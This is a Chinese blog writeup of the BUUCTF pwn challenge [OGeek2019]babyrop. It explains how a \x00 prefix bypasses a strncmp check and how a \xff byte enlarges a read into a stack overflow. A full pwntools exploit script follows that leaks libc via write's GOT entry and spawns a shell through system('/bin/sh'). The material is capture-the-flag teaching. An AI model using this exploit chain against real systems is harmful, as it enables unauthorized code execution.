【Writeup】BUUCTF_Pwn_[OGeek2019]babyrop
2019-09-03 13:01
2675 查看
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38100569/article/details/100515973
0x01 解题思路
- 文件基本信息
- IDA查看
读取一个随机数,然后与用户输入作比较,需要绕过。strlen遇到\x00会停止,因此只要开头为\x00,最终比较的长度v1就是0,从而绕过strncmp。
这里read的第三个读取长度参数实际上是前一个函数的返回值,可以通过上一次输入覆盖为\xff,然后就可以利用栈溢出进行常规ROP了。
0x02 EXP
#!/usr/bin/python #coding:utf-8 from pwn import * #context.log_level = 'debug' io = process('./pwn',env={"LD_PRELOAD":"./libc-2.23.so"}) #io = remote('node1.buuoj.cn', 28034) elf = ELF('./pwn') libc = ELF('./libc-2.23.so') def debug(): global io addr = raw_input("[+]debug:") gdb.attach(io, "b *"+addr) ''' puts_plt_addr = elf.plt['puts'] puts_got_addr = elf.got['puts'] ''' write_plt_addr = elf.plt['write'] write_got_addr = elf.got['write'] main_addr = 0x08048825 bin_sh_offset = 0x15902b # by libc-database payload = "\x00" payload += "\xff"*7 io.sendline(payload) io.recvuntil("Correct\n") offset = 0xE7 payload = 'A'*(offset+4) payload += p32(write_plt_addr) payload += p32(main_addr) payload += p32(1) payload += p32(write_got_addr) payload += p32(4) io.sendline(payload) data = io.recv(4) write_addr = u32(data) print "[+]write_addr:",hex(write_addr) libc_base_addr = write_addr - libc.symbols['write'] print "[+]libc_base_addr:",hex(libc_base_addr) system_addr = libc_base_addr + libc.symbols['system'] print "[+]system_addr:",hex(system_addr) bin_sh_addr = libc_base_addr + bin_sh_offset print "[+]bin_sh_addr:",hex(bin_sh_addr) payload = "\x00" payload += "\xff"*7 io.sendline(payload) io.recvuntil("Correct\n") payload = 'A'*(offset+4) payload += p32(system_addr) payload += 'AAAA' payload += p32(bin_sh_addr) #debug() #pause() io.sendline(payload) io.interactive()
相关文章推荐
- 【Writeup】CISCN2017_Pwn_babydriver
- hitcon 2016 pwn babyheap writeup
- 2017广东红帽杯pwn1_writeup:简单ROP
- XCTF-pwn-guess_num - Writeup
- 2019全国大学生信息安全竞赛初赛writeup
- hackme inndy pwn rsbo writeup
- volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
- zctf-pwn500-restaurant-write-up
- 0ctf 2017 babyheap writeup
- 绿盟杯NSCTF(CCTF)2017 pwn writeup
- jarvisoj pwn inst_prof writeup
- pwnhub——胖哈勃外传-第一集 writeup
- 第三届上海市大学生网络安全大赛 PWN200 WriteUp
- 0ctf 2017 kernel pwn knote write up
- jarvis oj pwn hiphop writeup
- 2019全国大学生信息安全与对抗技术竞赛全国线下总决赛 Writeup
- Tamevic’s Ctf-Pwn writeup@软件安全‘实验4pwn’
- sharif ctf pwn t00p_secrets writeup
- hackme inndy pwn veryoverflow writeup
- 2019ddctf web WriteUp